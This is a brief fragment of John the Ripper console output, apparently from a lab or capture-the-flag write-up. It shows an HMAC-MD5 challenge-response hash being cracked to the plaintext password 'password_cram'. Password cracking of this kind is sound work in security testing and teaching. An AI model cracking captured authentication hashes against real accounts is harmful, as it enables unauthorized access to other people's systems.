Loaded 1 password hash (HMAC-MD5 [password is key, MD5 256/256 AVX2 8x3])
Warning: poor OpenMP scalability for this hash type, consider --fork=8
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 192 needed for performance.
password_cram    (?)
1g 0:00:00:00 DONE (2020-04-17 01:06) 50.00g/s 50.00p/s 50.00c/s 50.00C/s password_cram
Use the "--show --format=HMAC-MD5" options to display all of the cracked passwords reliably
Session completed
```
